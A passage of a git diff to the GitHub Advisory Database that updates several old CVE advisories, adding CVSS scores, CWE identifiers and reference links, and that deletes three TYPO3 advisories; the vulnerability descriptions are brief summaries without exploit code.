"github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json b/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json index 4a229870c7000..ad7662d926ecb 100644 --- a/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json +++ b/advisories/unreviewed/2022/04/GHSA-7rhp-mjch-qq88/GHSA-7rhp-mjch-qq88.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7rhp-mjch-qq88", - "modified": "2022-04-30T18:17:25Z", + "modified": "2024-02-08T03:32:42Z", "published": "2022-04-30T18:17:25Z", "aliases": [ "CVE-2001-1125" ], "details": "Symantec LiveUpdate before 1.6 does not use cryptography to ensure the integrity of download files, which allows remote attackers to execute arbitrary code via DNS spoofing of the update.symantec.com site.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-494" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json b/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json index b2ee8b28d6c16..10632c4ad9ce4 100644 --- a/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json +++ b/advisories/unreviewed/2022/04/GHSA-832g-rwmf-rc6m/GHSA-832g-rwmf-rc6m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-832g-rwmf-rc6m", - "modified": "2022-04-30T18:17:14Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:14Z", "aliases": [ "CVE-2001-1043" ], "details": "ArGoSoft FTP Server 1.2.2.2 allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json b/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json index 08603b75d2fc3..e2bfd64840fa5 100644 --- a/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json +++ b/advisories/unreviewed/2022/04/GHSA-875x-x5q8-g85f/GHSA-875x-x5q8-g85f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-875x-x5q8-g85f", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:29Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2066" ], "details": "BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json b/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json index 1f882cede7686..a1a2696d35aa1 100644 --- a/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json +++ b/advisories/unreviewed/2022/04/GHSA-885f-x463-v454/GHSA-885f-x463-v454.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-885f-x463-v454", - "modified": "2022-04-30T18:13:26Z", + "modified": "2024-02-02T03:30:27Z", "published": "2022-04-30T18:13:26Z", "aliases": [ "CVE-2000-0342" ], "details": "Eudora 4.x allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka \"Stealth Attachment.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json b/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json index 9c7cd0418c643..06119d3f84faf 100644 --- a/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json +++ b/advisories/unreviewed/2022/04/GHSA-899x-jhm8-pc3m/GHSA-899x-jhm8-pc3m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-899x-jhm8-pc3m", - "modified": "2022-04-29T02:57:34Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T02:57:34Z", "aliases": [ "CVE-2004-0346" ], "details": "Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json b/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json index 18796572f646a..a4ecf9584d456 100644 --- a/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json +++ b/advisories/unreviewed/2022/04/GHSA-8ffw-58mq-48w9/GHSA-8ffw-58mq-48w9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8ffw-58mq-48w9", - "modified": "2022-04-29T01:26:22Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T01:26:22Z", "aliases": [ "CVE-2003-0411" ], "details": "Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase \".JSP\" extension instead of the lowercase .jsp extension.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json b/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json index 49340509bf896..5de1f8b62c01d 100644 --- a/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json +++ b/advisories/unreviewed/2022/04/GHSA-8hcc-583p-2372/GHSA-8hcc-583p-2372.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8hcc-583p-2372", - "modified": "2022-04-29T03:00:40Z", + "modified": "2024-02-08T18:30:37Z", "published": "2022-04-29T03:00:40Z", "aliases": [ "CVE-2004-2013" ], "details": "Integer overflow in the SCTP_SOCKOPT_DEBUG_NAME SCTP socket option in socket.c in the Linux kernel 2.4.25 and earlier allows local users to execute arbitrary code via an optlen value of -1, which causes kmalloc to allocate 0 bytes of memory.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json b/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json index 27e0f6fd7d4d7..589f023887ae3 100644 --- a/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json +++ b/advisories/unreviewed/2022/04/GHSA-8rc7-gfvj-2hjx/GHSA-8rc7-gfvj-2hjx.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26358" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json b/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json index be342c168d5e5..32a142942fd4c 100644 --- a/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json +++ b/advisories/unreviewed/2022/04/GHSA-8wgq-vhc2-3cqc/GHSA-8wgq-vhc2-3cqc.json @@ -41,7 +41,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json b/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json deleted file mode 100644 index c1d57d9f2bd24..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8xp9-99h5-4vcg", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3664" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Information Disclosure on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3664" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3664" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Information_Disclosure" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json b/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json index 6897651dc287a..aa10a488c436a 100644 --- a/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json +++ b/advisories/unreviewed/2022/04/GHSA-9c7h-3j4x-5hw6/GHSA-9c7h-3j4x-5hw6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9c7h-3j4x-5hw6", - "modified": "2022-04-29T01:27:25Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:27:25Z", "aliases": [ "CVE-2003-1048" ], "details": "Double free vulnerability in mshtml.dll for certain versions of Internet Explorer 6.x allows remote attackers to cause a denial of service (application crash) via a malformed GIF image.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -85,7 +88,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-415" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json b/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json index ce345071280ce..c0052506f47f8 100644 --- a/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json +++ b/advisories/unreviewed/2022/04/GHSA-9q6c-grq3-7prg/GHSA-9q6c-grq3-7prg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9q6c-grq3-7prg", - "modified": "2022-04-29T02:58:17Z", + "modified": "2024-02-02T15:30:26Z", "published": "2022-04-29T02:58:17Z", "aliases": [ "CVE-2004-0747" ], "details": "Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -22,54 +25,106 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17384" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5001ecf3d6b2bdd0b732e527654248abb264f08390045d30709a92f6%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5001ecf3d6b2bdd0b732e527654248abb264f08390045d30709a92f6@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r8c9983f1172a3415f915ddb7e14de632d2d0c326eb1285755a024165%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c9983f1172a3415f915ddb7e14de632d2d0c326eb1285755a024165@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd65d8ba68ba17e7deedafbf5bb4899f2ae4dad781d21b931c2941ac3@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re895fc1736d25c8cf57e102c871613b8aeec9ea26fd8a44e7942b5ab@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E" @@ -125,7 +180,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-120" + "CWE-120", + "CWE-131" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json b/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json index ef8e3cbef1b87..322c4785f49de 100644 --- a/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json +++ b/advisories/unreviewed/2022/04/GHSA-c29f-v77w-5564/GHSA-c29f-v77w-5564.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c29f-v77w-5564", - "modified": "2022-04-30T18:16:45Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:16:45Z", "aliases": [ "CVE-2001-0795" ], "details": "Perception LiteServe 1.25 allows remote attackers to obtain source code of CGI scripts via URLs that contain MS-DOS conventions such as (1) upper case letters or (2) 8.3 file names.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json b/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json index 1486907d5ae78..5312844902f11 100644 --- a/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json +++ b/advisories/unreviewed/2022/04/GHSA-c3mw-fh2q-7xx4/GHSA-c3mw-fh2q-7xx4.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26361" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json b/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json deleted file mode 100644 index c8821030d36b9..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c7xr-736p-29j3", - "modified": "2022-04-21T01:57:47Z", - "published": "2022-04-21T01:57:47Z", - "aliases": [ - "CVE-2010-3666" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness in the uniqid function.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3666" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3666" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-04T22:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json b/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json index 55d4657a76154..03bba6346586d 100644 --- a/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json +++ b/advisories/unreviewed/2022/04/GHSA-c8cf-4f7h-ccj4/GHSA-c8cf-4f7h-ccj4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c8cf-4f7h-ccj4", - "modified": "2022-04-30T18:17:37Z", + "modified": "2024-02-02T03:30:29Z", "published": "2022-04-30T18:17:37Z", "aliases": [ "CVE-2001-1238" ], "details": "Task Manager in Windows 2000 does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped with the Task Manager.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json b/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json deleted file mode 100644 index 5016753e59788..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cg45-qgcf-hf9x", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3660" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows XSS on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3660" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3660" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-01T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json b/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json index 61f7152afaae2..9201a9f511658 100644 --- a/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json +++ b/advisories/unreviewed/2022/04/GHSA-cgjq-p4q9-cfj7/GHSA-cgjq-p4q9-cfj7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cgjq-p4q9-cfj7", - "modified": "2022-04-30T18:12:41Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:12:41Z", "aliases": [ "CVE-1999-1549" ], "details": "Lynx 2.x does not properly distinguish between internal and external HTML, which may allow a local attacker to read a \"secure\" hidden form value from a temporary file and craft a LYNXOPTIONS: URL that causes Lynx to modify the user's configuration file and execute commands.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json b/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json index 88d07f27e8249..300b3dec2da62 100644 --- a/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json +++ b/advisories/unreviewed/2022/04/GHSA-cx2h-jfxr-vw9c/GHSA-cx2h-jfxr-vw9c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cx2h-jfxr-vw9c", - "modified": "2022-04-29T02:58:39Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-29T02:58:39Z", "aliases": [ "CVE-2004-0940" ], "details": "Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -22,30 +25,58 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17785" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734a07156abf332d5ab27fb91d9d962cacfef4f3681e44056f064fa8@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": 